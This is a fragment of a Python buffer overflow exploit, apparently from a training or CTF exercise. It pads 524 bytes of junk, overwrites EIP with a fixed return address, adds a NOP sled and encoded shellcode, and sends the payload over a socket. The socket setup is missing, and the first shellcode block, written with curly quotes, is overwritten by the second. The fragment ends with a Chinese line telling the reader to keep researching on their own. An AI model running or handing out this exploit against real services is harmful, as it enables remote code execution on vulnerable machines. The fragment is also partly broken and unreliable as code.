junk = b"\x41"*524
eip = b"\xf3\x12\x17\x31"
shellcode =b"\x90" * 50
buf = “”
buf += “\xda\xcd\xba\x11\xe7\x27\xad\xd9\x74\x24\xf4\x58\x29”
buf += “\xc9\xb1\x12\x83\xe8\xfc\x31\x50\x13\x03\x41\xf4\xc5”
buf += “\x58\x50\x21\xfe\x40\xc1\x96\x52\xed\xe7\x91\xb4\x41”
buf += “\x81\x6c\xb6\x31\x14\xdf\x88\xf8\x26\x56\x8e\xfb\x4e”
buf += “\xa9\xd8\x75\x18\x41\x1b\x86\x26\x08\x92\x67\x96\x4a”
buf += “\xf5\x36\x85\x21\xf6\x31\xc8\x8b\x79\x13\x62\x7a\x55”
buf += “\xe7\x1a\xea\x86\x28\xb8\x83\x51\xd5\x6e\x07\xeb\xfb”
buf += “\x3e\xac\x26\x7b”
buf = b""
buf += b"\xdb\xda\xb8\x16\x19\x26\xae\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x12\x83\xc2\x04\x31\x42\x13\x03\x54\x0a\xc4"
buf += b"\x5b\x69\xf7\xff\x47\xda\x44\x53\xe2\xde\xc3\xb2\x42"
buf += b"\xb8\x1e\xb4\x30\x1d\x11\x8a\xfb\x1d\x18\x8c\xfa\x75"
buf += b"\x5b\xc6\x93\x05\x33\x15\x6c\x1f\xce\x90\x8d\xaf\xa8"
buf += b"\xf2\x1c\x9c\x87\xf0\x17\xc3\x25\x76\x75\x6b\xd8\x58"
buf += b"\x09\x03\x4c\x88\xc2\xb1\xe5\x5f\xff\x67\xa5\xd6\xe1"
buf += b"\x37\x42\x24\x61"
payload = junk + eip + shellcode + buf
s.send(payload)
print (s.recv(1024))
s.close()
自己继续研究
